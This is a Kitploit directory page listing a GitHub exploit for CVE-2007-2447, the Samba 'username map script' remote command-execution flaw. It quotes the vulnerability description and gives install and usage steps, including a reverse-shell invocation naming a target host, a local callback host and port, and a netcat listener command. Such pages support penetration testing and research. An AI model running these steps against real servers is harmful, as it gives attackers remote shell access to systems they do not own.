Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2007-2447 | Kitploit
Tools/GitHubGitHub/0xkn/cve-2007-2447
Vulnerability AnalysisExploitationShellcodePenetration TestingCommand and ControlRemote Access Tool
GitHub0xkn/cve-2007-2447

CVE-2007-2447

View Repository
5 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2007-2447 - username map script

"The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management."

Exploit

Installation:

[*] This exploit requires Python 3.7 or higher

root@kitploit:~
python3 -m pip install pysmb 

Usage:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- Remote Host
  • --lhost -- Local Host
  • --lport -- Local Port
  • --rport -- Remote Port [*] Optional. default=445

Do not forget to start your listener:

root@kitploit:~
nc -lvnp 4444

PoC

image

Download Tool